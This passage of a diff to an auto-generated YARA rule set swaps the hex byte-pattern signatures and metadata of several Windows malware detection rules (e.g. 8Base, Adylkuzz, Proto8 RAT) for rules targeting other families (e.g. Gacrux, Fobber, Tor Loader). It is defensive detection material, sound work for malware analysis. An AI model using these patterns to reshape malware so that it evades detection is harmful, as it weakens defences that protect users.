-		$sequence_4 = { 6800000040 50 e8???????? 83c43c 83f8ff 8945ec 7511 }
-		$sequence_5 = { 817dfc01040000 7513 68???????? ff75f8 e8???????? 59 }
-		$sequence_6 = { e8???????? 68ad030000 68???????? 6888000000 6a6e e9???????? 8b453c }
-		$sequence_7 = { b800080000 33db 57 66394608 8b3d???????? 7516 833e01 }
-		$sequence_8 = { 81eca8030000 53 56 33db 6a40 8d45b0 53 }
-		$sequence_9 = { 53 53 6a01 53 8d8588feffff 53 50 }
+		$sequence_0 = { 8a01 3c30 7c04 3c39 7e13 3c61 7c04 }
+		$sequence_1 = { 7e0b 3c41 7c04 3c5a 7e03 c60158 }
+		$sequence_2 = { 7e13 3c61 7c04 3c7a 7e0b 3c41 }
+		$sequence_3 = { 33c0 3903 5f 5e 0f95c0 5b 8be5 }
+		$sequence_4 = { 3c5a 7e03 c60158 41 803900 75dd }
+		$sequence_5 = { 83c020 eb03 0fb7c0 69d23f000100 }
+		$sequence_6 = { 8bc1 c1e808 8d5204 c1e910 8842fd 884afe c1e908 }
+		$sequence_7 = { 7416 6683385c 740a 83c002 }
+		$sequence_8 = { 75f2 eb06 33c9 66894802 }
+		$sequence_9 = { 8d5801 f6c30f 7406 83e3f0 }
+		$sequence_10 = { 0faf4510 50 6a08 ff15???????? }
+		$sequence_11 = { 8b477c 85c0 7448 8b00 2b878c000000 }
+		$sequence_12 = { 03c7 56 50 8b4774 03878c000000 50 ff15???????? }
+		$sequence_13 = { 83c40c 8b4d0c 8bc2 0bc1 }
+		$sequence_14 = { 03878c000000 50 ff15???????? 017758 83c40c 29775c }
+		$sequence_15 = { 8b780c 8bd9 83c70c 8b37 }
+		$sequence_16 = { 8b4604 8b16 8945fc 8d45f8 6a04 50 }
+		$sequence_17 = { 81ca00000020 50 52 51 }
+		$sequence_18 = { c745fc04000000 50 8d45f8 81ca00000020 50 }
+		$sequence_19 = { 483bd8 730b 488bcb e8???????? 488bd8 }
+		$sequence_20 = { 66c1e908 418848ff 4d3bd9 72cf }
+		$sequence_21 = { 48895010 4c894018 4c894820 c3 }
+		$sequence_22 = { 2bca d1e9 03ca c1e906 894d20 }
+		$sequence_23 = { 488bd3 488bcf 488b5c2460 4883c450 }
+		$sequence_24 = { 0fb7c1 c1e910 66c1e808 4d8d4004 418840fd 418848fe }
+		$sequence_25 = { 418bd0 d3e2 418bcb d3e0 03d0 }
+		$sequence_26 = { d3e7 83f841 7208 83f85a }
+		$sequence_27 = { 4c8bdc 49895b08 49896b10 49897318 49897b20 4156 4883ec70 }
+		$sequence_28 = { c1e807 46 83f87f 77f7 }
+		$sequence_29 = { f7e1 b84fecc44e 2bca d1e9 }
+		$sequence_30 = { 84c0 75f2 eb03 c60100 }
+		$sequence_31 = { 83c104 894e04 8b00 85c0 }
+		$sequence_32 = { 0fb6c0 668942fa c1e910 0fb6c1 }
+		$sequence_33 = { 7907 83c107 3bf7 72e8 }
+		$sequence_34 = { 56 57 6a1e 8d45e0 }
+		$sequence_35 = { 52 52 52 68???????? 52 }
+		$sequence_36 = { 83ec48 53 56 57 6a44 }
+		$sequence_37 = { 83f87f 760d 8d642400 c1e807 }
+		$sequence_38 = { b901000000 83f87f 7609 c1e807 }
+		$sequence_39 = { 7609 c1e807 41 83f87f }
+		$sequence_40 = { 6a00 6aff 50 51 ff15???????? }
+		$sequence_41 = { 68400000f0 6a18 33f6 56 }
+		$sequence_42 = { 83ec08 56 68400000f0 6a18 }
+		$sequence_43 = { 6a00 ff75fc 6800040000 6a00 6a00 }
+		$sequence_44 = { 53 56 8bf1 bb00c34c84 }
+		$sequence_45 = { 50 56 6800800000 6a6a }
+		$sequence_46 = { 31d2 f7f1 8b0d???????? 8a1c11 }
+		$sequence_47 = { 8d0492 89ca 29c2 89d0 }
+		$sequence_48 = { 01c1 8b55f4 8b0402 83f800 }
+		$sequence_49 = { 6a03 6a00 6a00 ff7508 53 50 }
+		$sequence_50 = { 8b466c 5f 5e 5b 8be5 5d }
+		$sequence_51 = { 8bf1 bb00c34c84 57 33ff }
+		$sequence_52 = { 01ca 89d6 83c604 8b7de0 8b4c0f04 83f900 }
+		$sequence_53 = { 01ca 89d6 83c60c 8b7df4 8b4c0f0c }
+		$sequence_54 = { 83ec10 53 6a00 8d45fc }
+		$sequence_55 = { 8d4df8 51 ff75f8 50 6a03 6a30 }
+		$sequence_56 = { 55 8bec 83ec08 56 57 8bf1 33ff }
+		$sequence_57 = { 8b7020 8b7840 89c3 83c33c }
+		$sequence_58 = { 743e 8b5c2430 85db 741d }
+		$sequence_59 = { 33d2 c605????????00 0fb6d8 e8???????? }
+		$sequence_60 = { 8bf8 e8???????? eb04 8b7c2430 }
+		$sequence_61 = { e8???????? 84c0 7519 33c9 0f1f4000 }
+		$sequence_62 = { 31c9 89e2 31f6 89720c }
+		$sequence_63 = { 31f6 89720c 897208 897204 }
+		$sequence_64 = { ff15???????? 83f803 7405 83f802 751e }
+		$sequence_65 = { e8???????? 488d1527400000 41b804010000 8b4850 890d???????? 33c9 }
+		$sequence_66 = { 83c310 89542454 894c2450 895c244c }
+		$sequence_67 = { 8b1f 8bac2484000000 8b7d00 8b6c2478 01fd 89442438 8b442478 }
+		$sequence_68 = { 8d95fcfeffff 52 e8???????? 8db5fcfeffff }
+		$sequence_69 = { 488d15c6220000 488bcb ff15???????? 85c0 7528 }
+		$sequence_70 = { 5b c3 8b442408 8b0c850440d800 8b542410 }
+		$sequence_71 = { 48 895c2450 90 8b0f 48 8d15b71f0000 }
+		$sequence_72 = { 0f28ca f20f11942480000000 f20f114c2458 89442454 }
+		$sequence_73 = { 48 8d0d73440000 48 8bd3 48 83c440 }
+		$sequence_74 = { 83c101 8b542414 83c228 8b742468 }
+		$sequence_75 = { 0f84c0000000 488d542430 488bc8 4889742470 e8???????? 488bf0 }
 
 	condition:
-		7 of them and filesize < 1228800
+		7 of them and filesize < 733184
 }
-rule MALPEDIA_Win_8Base_Auto : FILE
+rule MALPEDIA_Win_Gacrux_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "75838edc-73a2-5e39-b8ec-96e50d44170a"
+		id = "74bca4e5-6c17-575a-bd9e-7779af62a65b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8base"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.8base_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gacrux_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "928a212ebdb041c9575d16d9def4153d3085b06453acab4557e4b175f3e06eda"
+		logic_hash = "4b479a315235bf10794aaaf7db4a148e9833fd69e020e24b4a290812be385016"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101798,32 +101937,32 @@ rule MALPEDIA_Win_8Base_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd6 8d8c2420010000 51 ffd7 8d942440110000 }
-		$sequence_1 = { f8 290c67 98 a6 73c2 }
-		$sequence_2 = { 68ff000000 e8???????? 59 59 8b7508 8d34f588b34200 391e }
-		$sequence_3 = { 75b9 e8???????? a1???????? a3???????? ffd0 }
-		$sequence_4 = { c684249c00000002 50 c7442410043a4000 e8???????? }
-		$sequence_5 = { d3ea 89542414 8b442434 01442414 8b442424 31442410 }
-		$sequence_6 = { ff15???????? 8b442414 40 3d???????? 89442414 0f8c0effffff 8b35???????? }
-		$sequence_7 = { 894c2438 89542434 e8???????? a1???????? 814424283f020000 }
-		$sequence_8 = { 6689442416 33c9 668954241a 8d442434 50 66894c241c 8b4c241c }
-		$sequence_9 = { 899c24ac000000 3bfb 7449 8b8424b8000000 56 8d742418 }
+		$sequence_0 = { 7410 44 8bc2 48 8bc6 33d2 49 }
+		$sequence_1 = { e8???????? 48 8bcf e8???????? 8b442450 48 8b5c2458 }
+		$sequence_2 = { 4c 23e9 48 23c1 }
+		$sequence_3 = { 8d4c2438 45 33c0 33d2 }
+		$sequence_4 = { 85c9 0f857bffffff 898d28010000 48 8d8528010000 }
+		$sequence_5 = { 33c9 4d 8d5202 41 8bc9 }
+		$sequence_6 = { 48 83ec40 41 8be8 4c 8bf2 41 }
+		$sequence_7 = { 8b0f e8???????? 48 85c0 751b }
+		$sequence_8 = { b8e9bfac86 48 6bd938 e8???????? 4c 8bcb 4c }
+		$sequence_9 = { 41 8bd4 e8???????? 48 8d4c2430 45 }
 
 	condition:
-		7 of them and filesize < 10838016
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Bamital_Auto : FILE
+rule MALPEDIA_Win_Salgorea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9e41d3b4-c83b-5900-9fce-309a5ed93679"
+		id = "e83328a9-575c-5760-8b43-23537ecb114c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bamital_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.salgorea_auto.yar#L1-L157"
 		license_url = "N/A"
-		logic_hash = "5e66490a96474a739f708c54bb1198a62bba1cb62437d954f80417ba9cecdcf4"
+		logic_hash = "84460b5404731160a6417d2e0703563ce9ec3d697d914eab182f90119819d293"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101837,32 +101976,38 @@ rule MALPEDIA_Win_Bamital_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6800040000 e8???????? 8045f301 ff45fc }
-		$sequence_1 = { 803820 7516 83c101 83f901 7504 8bd0 }
-		$sequence_2 = { 2c1f b47e 02e0 80ec19 }
-		$sequence_3 = { ff75f8 ff7508 e8???????? e8???????? 8b7dfc }
-		$sequence_4 = { 52 8b5508 b800000000 803a00 7408 }
-		$sequence_5 = { 837dd800 7505 e9???????? 837df000 }
-		$sequence_6 = { 8945f8 8b4df8 2b4d08 51 }
-		$sequence_7 = { 8bec 56 50 8b550c 8b7508 }
-		$sequence_8 = { 8bd0 eb0a 83f904 7505 c60000 eb05 83c001 }
-		$sequence_9 = { 83f901 7504 8bd0 eb0a 83f904 7505 c60000 }
+		$sequence_0 = { f6d7 f7d9 6633d2 66b8b4d2 66b918f6 66f7f1 }
+		$sequence_1 = { 57 8b7910 3bfb 0f830a000000 }
+		$sequence_2 = { 8b44240c 0fbafa00 0fbcd2 8b542418 }
+		$sequence_3 = { d1e0 2ac1 0fbae001 37 d0e0 }
+		$sequence_4 = { b85b000000 51 b92ae90000 f7f1 0fbae304 6603c9 }
+		$sequence_5 = { 3bfb 0f830a000000 68???????? e8???????? 8b4510 }
+		$sequence_6 = { 660fbafa04 2f fec3 27 b885000000 f9 81f1b8600000 }
+		$sequence_7 = { 664b f9 52 80c237 66b86c00 }
+		$sequence_8 = { a1???????? 8945cc 8d45cc 3930 }
+		$sequence_9 = { 8d8c0ed6c162ca 8b704c 03f1 8b4850 }
+		$sequence_10 = { 8d8c0b78a46ad7 c1c107 03cf 8bde }
+		$sequence_11 = { 8d8c24b8000000 51 e8???????? 83c40c }
+		$sequence_12 = { 8d8c0b2211906b c1c107 03cf 8bfe }
+		$sequence_13 = { 8d8c399979825a 8b7df4 337df8 8bd1 }
+		$sequence_14 = { 8d8c0550fbffff e8???????? 83c408 eb16 ff75f8 }
+		$sequence_15 = { 8d8c399979825a 8bfe 337df0 8bd1 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 2007040
 }
-rule MALPEDIA_Win_Buterat_Auto : FILE
+rule MALPEDIA_Win_Woolger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "25ad2a50-49be-5d4a-bf97-43396868ed49"
+		id = "3c730e5d-f238-51dc-9ad2-e2cb34cd5f3e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.buterat_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.woolger_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "b70d6ce44ee783afa32cbecdbe7cf8ccdf3b06b682102fb9a600b816f864c117"
+		logic_hash = "a6736c829d032e2c9f6601605bc9a8797d9883ec84504553869cd4b3046fa27f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101876,32 +102021,32 @@ rule MALPEDIA_Win_Buterat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff750c 8d8564ffffff 50 56 8d5de8 e8???????? 83c414 }
-		$sequence_1 = { c3 8bce 69c944010000 8d81a05b4100 8b10 c1e204 }
-		$sequence_2 = { b9???????? e8???????? 6a00 50 ff15???????? 8bf0 }
-		$sequence_3 = { ff7570 56 e8???????? 8b4574 }
-		$sequence_4 = { 33f6 40 eb1a 81f900000100 }
-		$sequence_5 = { e8???????? 99 f77dfc 8bda 837d6806 750b e8???????? }
-		$sequence_6 = { 33c0 40 8b4d1c 3bce 7405 }
-		$sequence_7 = { 8bec 83ec2c 56 57 6a02 8bf0 }
-		$sequence_8 = { 56 57 7512 0fb64508 6bc014 8bb848044200 897dfc }
-		$sequence_9 = { 53 53 a3???????? 895c2420 895c2424 895c241c 53 }
+		$sequence_0 = { 8b4508 8b0d???????? 57 52 50 }
+		$sequence_1 = { 84d2 75f9 8dbdfcf8ffff 2bc1 }
+		$sequence_2 = { 6685c0 8d85fcfeffff 50 0f95c3 ff15???????? 8b4f08 }
+		$sequence_3 = { 83c408 85c0 7516 6a01 68???????? }
+		$sequence_4 = { be???????? e9???????? 83f80b 750a be???????? e9???????? 83f80d }
+		$sequence_5 = { e8???????? 8d85fcf6ffff 83c40c 8bc8 8a10 40 }
+		$sequence_6 = { 8d85fcfcffff 889508ffffff 898d04ffffff 8bd0 8a08 }
+		$sequence_7 = { 8b450c 3d00010000 740b 3d04010000 0f853b020000 }
+		$sequence_8 = { 885004 8d85fcfcffff 50 8d8dfcfdffff }
+		$sequence_9 = { 668945d4 8945d6 8945da 8945de 8945e2 8945e6 8945ea }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Waterminer_Auto : FILE
+rule MALPEDIA_Win_Fobber_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "015d17f9-270a-5ff3-ae6a-8c2f19540faa"
+		id = "1c71dc66-f917-5ba2-9fb8-1fb21c7a75f0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.waterminer_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fobber_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "fee2af94ed2d9b29403d90ebf96331b0858215bab4f3b7310fc1b1dc42373d50"
+		logic_hash = "61538df65ce7e18f8d160f3c894437f915290dca7e112a40d32b84ca774989b9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101914,39 +102059,39 @@ rule MALPEDIA_Win_Waterminer_Auto : FILE
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
-	strings:
-		$sequence_0 = { 03bc24a8000000 488bcd 4c8d0d35cb0300 83e13f }
-		$sequence_1 = { 46 007e9f 46 0000 07 }
-		$sequence_2 = { 8b5508 3b14cd88c04900 750c 8b45fc 8b04c58cc04900 eb04 }
-		$sequence_3 = { 00ed ac 45 00fc ac 45 }
-		$sequence_4 = { 02d0 49ffc3 418d4001 881418 }
-		$sequence_5 = { 8b55e0 8b450c 8b75e0 668b8c7154074b00 66894c500c }
-		$sequence_6 = { 0344240c 4403d0 428b4405e7 418bd2 }
-		$sequence_7 = { 8b5508 c1fa05 8b4508 83e01f c1e006 8b0c95c02b4b00 837c013800 }
-		$sequence_8 = { 0fb69144314800 ff249538314800 c745c806000000 eb22 8b45cc 83e801 8945cc }
-		$sequence_9 = { 03c1 03d0 488d051e580500 418b0400 }
-		$sequence_10 = { 6bc01c 8b8880434b00 330d???????? 894dfc 740c }
-		$sequence_11 = { 8b5508 83e21f c1e206 8b048dc02b4b00 833c10ff }
-		$sequence_12 = { 03c0 2bc8 0f84ec040000 8d41ff 8b848288d20600 }
-		$sequence_13 = { 02c8 41880c18 418a03 240f }
-		$sequence_14 = { 03442410 4403e8 428b4405e7 418bd5 }
-		$sequence_15 = { 0344240c 4403d0 488d051a560500 418b0400 }
+	strings:
+		$sequence_0 = { 8b5508 8b4d0c 3002 c0c803 }
+		$sequence_1 = { 57 e8???????? 85c0 740f 89c1 8b450c fc }
+		$sequence_2 = { 660fc146f9 6685c0 7515 0fb646f8 50 0fb746f6 }
+		$sequence_3 = { 8d4d08 51 ff31 ffd0 85c0 7403 8b4508 }
+		$sequence_4 = { 55 89e5 51 57 8b7d08 57 }
+		$sequence_5 = { 31c9 f7d1 fc f2ae f7d1 }
+		$sequence_6 = { 55 89e5 31c0 50 50 ff750c ff7508 }
+		$sequence_7 = { 3002 c0c803 0453 42 }
+		$sequence_8 = { 0485 40 47 c9 7283 e61f }
+		$sequence_9 = { 028736c8f07c 7d41 6f 01e9 }
+		$sequence_10 = { 4a bdb098f55a 6798 5b 348d 5a }
+		$sequence_11 = { 81c112500000 81c1d6530000 81e951b50000 81e9a88bffff 81c17d5b0000 }
+		$sequence_12 = { 8bec a1???????? 80383f 7414 6a00 }
+		$sequence_13 = { df9c6182a5b1b2 e8???????? 54 e437 d3766f fa 42 }
+		$sequence_14 = { d470 44 b200 4f }
+		$sequence_15 = { 8d46ff 0f85196e0100 807dfc00 7407 8b4df8 836170fd 5e }
 
 	condition:
-		7 of them and filesize < 1556480
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Leouncia_Auto : FILE
+rule MALPEDIA_Win_Heloag_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "32ec41a2-2da2-577f-8d90-05e26877f66a"
+		id = "b40ebeb0-65d9-5544-943f-e43dc7de3667"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.leouncia_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.heloag_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "f4b700de9db33424264876c9622563c2f372a2b66a216a2beabd8c8a0520c076"
+		logic_hash = "3cbec035b3658dcc2108c96dd5a7b448e19c5bb5b801b5096a103c1055c563fa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101960,32 +102105,38 @@ rule MALPEDIA_Win_Leouncia_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b442444 6a64 50 ff15???????? 3bc3 }
-		$sequence_1 = { c644046000 8d442460 50 e8???????? 8bf0 83c410 }
-		$sequence_2 = { 7714 8088????????10 8ac8 80c120 888820af4000 eb1f }
-		$sequence_3 = { 55 8bac2430040000 56 8b11 8d7010 8954240c }
-		$sequence_4 = { 55 ff15???????? 8bd8 89442430 2bde }
-		$sequence_5 = { ff15???????? 8be8 3beb 896c2424 7514 }
-		$sequence_6 = { c744240800540000 56 e8???????? 83c404 85c0 0f84f0000000 6a00 }
-		$sequence_7 = { 8d4c2454 8d542434 51 50 }
-		$sequence_8 = { 50 f3a4 e8???????? 8d7c2438 }
-		$sequence_9 = { e8???????? 8d542448 8bf0 52 e8???????? 83c424 81fec8000000 }
+		$sequence_0 = { 83c9ff bf???????? 33c0 8965f0 f2ae f7d1 }
+		$sequence_1 = { 8945e4 85db 0f847b020000 8bfb 83c9ff 33c0 }
+		$sequence_2 = { 8bf7 8bfa 8d95dcfeffff c1e902 f3a5 }
+		$sequence_3 = { 64892500000000 81ec48030000 53 56 }
+		$sequence_4 = { 33c0 bf???????? 881d???????? f3ab 8b4df4 64890d00000000 5f }
+		$sequence_5 = { 7577 56 ff15???????? 85c0 7507 }
+		$sequence_6 = { b907000000 bf???????? c605????????01 50 f3a5 }
+		$sequence_7 = { 8bca 53 83e103 53 f3a4 a1???????? }
+		$sequence_8 = { 49 51 56 68???????? }
+		$sequence_9 = { a1???????? 894304 8b5608 895308 }
+		$sequence_10 = { 8a442413 6a00 8bce 8806 ff15???????? }
+		$sequence_11 = { 84c0 742d 8b7604 85f6 7506 8b35???????? 8b7b04 }
+		$sequence_12 = { 8b11 8bcf 52 6a00 50 }
+		$sequence_13 = { 53 8bcd ff15???????? 6a00 6a00 }
+		$sequence_14 = { 894b0c 8a48ff fec1 8848ff eb3c 6a01 }
+		$sequence_15 = { 3bcd 8b07 89442410 7464 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Adylkuzz_Auto : FILE
+rule MALPEDIA_Win_Carrotbat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "265860c5-c195-5ef7-81e8-066fa261eab1"
+		id = "1f5a4e61-8efd-5abd-b8fb-2f87b63c93c7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.adylkuzz_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.carrotbat_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "a5ced23a2b6a73ae95a9a6a65000eaf7907a66a0c142cf3646367ed2ee46dd3d"
+		logic_hash = "e53146cb3545ca99ae66e1a10fcb74cff088286f73e969b286c25b4fb9383fdf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101999,32 +102150,32 @@ rule MALPEDIA_Win_Adylkuzz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 89ea 89f0 81ca29000200 e8???????? 8b542408 89c5 }
-		$sequence_1 = { 0f8579ffffff 8b4508 89442404 8b85d4feffff 890424 e8???????? 85c0 }
-		$sequence_2 = { f5 663bf6 f7c7b40e1e7c 33c3 85d9 f9 6681ff3c41 }
-		$sequence_3 = { c744240800000000 89442404 e8???????? 83c41c 5b 5e 5f }
-		$sequence_4 = { e9???????? 3dfc000000 7610 3bab98000000 7208 89f0 83c880 }
-		$sequence_5 = { c744241001000000 89c7 eb20 8b4500 8d5008 89d8 e8???????? }
-		$sequence_6 = { c7431001000000 89f7 31c0 83c9ff 89f2 f2ae 89d8 }
-		$sequence_7 = { e8???????? 85c0 7473 89d8 8b33 e8???????? 31d2 }
-		$sequence_8 = { f8 6681fd5547 34ad fec8 32d8 8dadfeffffff 3be1 }
-		$sequence_9 = { eb24 8d4aff 31c0 85d1 751b c6437523 0fbdd2 }
+		$sequence_0 = { 8bce c1f905 8b0c8d20ee4000 83e61f c1e606 89040e 8b45f8 }
+		$sequence_1 = { 8945fc 6804010000 8d85f8feffff 50 6a00 ff15???????? 33c0 }
+		$sequence_2 = { 3008 8b06 8bc8 c1f905 8b0c8d20ee4000 }
+		$sequence_3 = { 8bc6 c1f805 8d148520ee4000 8b0a 83e61f }
+		$sequence_4 = { 8974241c 5f 660fbef9 66f7d7 66f7d7 c744241480000000 66f7d7 }
+		$sequence_5 = { c60000 8d85f4fdffff 6a5c 50 }
+		$sequence_6 = { f5 0f88d7feffff d2df 660fa5cf }
+		$sequence_7 = { ff35???????? 8f442420 66c7442404beba 66c7442408844e e8???????? 8d642418 e8???????? }
+		$sequence_8 = { 53 660fb6cb 893424 0fc9 f6d5 9c ff3424 }
+		$sequence_9 = { 897de4 8bc7 c1f805 8bcf 83e11f c1e106 8b048520ee4000 }
 
 	condition:
-		7 of them and filesize < 6438912
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Putabmow_Auto : FILE
+rule MALPEDIA_Win_Lilith_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7af0c993-b539-52ac-a45e-8054f116f777"
+		id = "82364ac2-deb7-51b6-ba0e-2be91de6e553"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.putabmow_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lilith_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "fefc0574406d648a12b534d0b553ded64a93f4ffe228447991ac5fd25e755fac"
+		logic_hash = "e60f46a761d89df2badd5fa4f4597b68f40a30e0a662e1d347c30e5849d899e2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102038,32 +102189,32 @@ rule MALPEDIA_Win_Putabmow_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fbec2 897dc0 8d0448 83c0d0 8945d8 }
-		$sequence_1 = { 7509 8b4c240c e8???????? c7442420ffffffff 8b4c240c 8b01 8b4004 }
-		$sequence_2 = { ba02000000 8bcf e8???????? 8b4df4 e9???????? 837b1802 0f8538010000 }
-		$sequence_3 = { c745ec0f000000 c745e800000000 c645d800 c745fc03000000 8d45d8 8bce 50 }
-		$sequence_4 = { c600e9 8b06 8b8e4c010000 5e 5b 89540101 b801000000 }
-		$sequence_5 = { 895dfc 85f6 7464 8b450c 8b08 85c9 }
-		$sequence_6 = { 7fcf 47 0fbec0 8d0c89 897dc0 8d49e8 }
-		$sequence_7 = { 83c408 a3???????? 53 57 ffd0 8b4df4 64890d00000000 }
-		$sequence_8 = { c7462c00000000 c7463000000000 c645fc01 8b461c 85c0 }
-		$sequence_9 = { eb02 8bc6 8a0458 43 8ac8 }
+		$sequence_0 = { 8b4d08 898814434300 68???????? e8???????? 8be5 5d c3 }
+		$sequence_1 = { 897df0 8b04bda84b4300 8955e8 8a4c0228 884dff f6c101 0f8425030000 }
+		$sequence_2 = { 6bc830 8b0495a84b4300 f644082801 7421 }
+		$sequence_3 = { c78558ffffff0f000000 c78554ffffff00000000 c68544ffffff00 c745fc00000000 8b3d???????? 8b1d???????? 0f1f4000 }
+		$sequence_4 = { c78560ffffff00000000 6a00 50 c7855cffffff00000000 e8???????? 83c40c }
+		$sequence_5 = { 83fe04 7cdc 5f 5e }
+		$sequence_6 = { ffb390210000 ff15???????? 83f8ff 740f 03f0 }
+		$sequence_7 = { d3c8 3305???????? 3905???????? 0f85334a0000 ff7508 e8???????? }
+		$sequence_8 = { 53 8b5d10 8b0485a84b4300 56 }
+		$sequence_9 = { 56 57 ff7520 8bf1 e8???????? }
 
 	condition:
-		7 of them and filesize < 704512
+		7 of them and filesize < 499712
 }
-rule MALPEDIA_Win_Proto8_Rat_Auto : FILE
+rule MALPEDIA_Win_Tor_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "083740c0-add4-5086-9bb3-129b00384856"
+		id = "97401572-684c-58d7-8ba8-1e13d7e2a1eb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.proto8_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.proto8_rat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tor_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tor_loader_auto.yar#L1-L134"
 		license_url = "N/A"
